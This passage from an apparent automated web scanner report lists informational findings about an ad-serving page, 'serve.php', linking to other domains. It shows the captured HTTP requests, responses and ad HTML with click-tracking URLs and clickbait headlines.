<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.62. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:57:08 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11">Do You Miss Being Happy?</a></span>
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.63. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:36:31 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11">Do You Miss Being Happy?</a></span>
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.64. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:15:58 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
